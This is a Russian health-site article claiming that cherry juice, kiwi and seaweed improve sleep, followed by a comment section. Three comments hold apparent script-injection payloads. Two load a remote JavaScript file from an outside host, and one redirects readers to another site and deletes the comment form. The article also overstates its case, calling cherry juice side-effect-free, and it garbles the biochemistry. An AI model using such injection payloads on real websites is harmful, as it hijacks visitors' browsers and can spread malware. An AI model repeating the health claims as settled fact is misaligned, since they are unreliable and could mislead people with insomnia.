Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пей это и спи на 90 минут...  >>  Пей это и спи на 90 минут лучше!
 
Обратная связь
 

Пей это и спи на 90 минут лучше!

Размер шрифта
24 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Вам больше не нужно считать овец, чтобы заснуть. Ученые из Университета Луизианы доказали, что два стакана вишневого сока в день помогают спать ночью на целых 90 минут больше.

Пей это и спи на 90 минут лучше!

В эксперименте, проходившем в Университете Луизианы, приняли участие пожилые люди, страдавшие от бессонницы. Все они в течение двух недель дважды в день пили вишневый сок, затем последовал двухнедельный перерыв, а после этого они две недели употребляли напиток-плацебо. По полученным данным, в отличие от плацебо (пустышки), вишневый сок действительно увеличивал длительность сна в среднем на 84 минуты.

Вишневый сок является природным источником гормона мелатонина, отвечающего за регуляцию цикла сон-бодрствование, а также аминокислоты триптофана. «Проантоцианидины – красные пигменты вишневого сока, содержат белок, который уменьшает воспаление и препятствует разрушению трипрофана, благодаря чему он остается в организме более длительное время», – рассказывает Фрэнк Гринвей из Биомедицинского исследовательского центра Пеннингтона, соавтор работы.

Гринвей также отмечает, что более трети всех американцев старше 65 лет страдают от бессонницы. При этом состоянии у человека возникают проблемы со сном более трех раз в неделю. Гринвей считает, что употребление вишневого сока – наиболее безопасный способ улучшить качество сна. В отличие от различных препаратов, способствующих засыпанию, вишневый сок не обладает никакими побочными эффектами. «Употребление снотворных препаратов в 4 раза увеличивает риск обмороков у пожилых людей, что в их возрасте может быть очень опасно из-за высокой вероятности переломов», – объясняет Гринвей.

Если вы не любите вишневый сок, то вам стоит присмотреться к киви. Два киви, съеденные за час до сна, позволяют увеличить общее время сна на 13% и снижают количество ночных пробуждений на 29%. Таких результатов можно добиться всего за четыре недели, считают ученые из Китая. Морские водоросли тоже обладают благотворным воздействием на сон, особенно у детей, так как богаты омега-3 жирными кислотами; к такому выводу недавно пришли ученые из Оксфорда.

Так что если вам бывает трудно заснуть, не спешите закупаться снотворными. Вишневый сок не только поможет вам решить проблемы со сном, но и послужит отличным дополнением к ежедневному рациону.

Другие статьи о здоровом сне ищите на страницах нашего одноименного спецпроекта.

Результаты этого исследования были представлены на конференции Experimental Biology.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выпей это и спи как никогда!   Как уснуть, если мысли бегают в голове   Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Синхронность сна скажет, насколько вы удовлетворены мужем!  
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 30 января 2013Хотите не чувствовать боли – спите дольше
 
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 30 мая 2013Храпящие люди в 3 раза чаще разбиваются на машинах! Как этого избежать
 

Слайдшоу

1
Что мешает вам уснуть?
Как высыпаться
Как взбодриться на работе и не попасть под сокращение?

Тесты

1
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.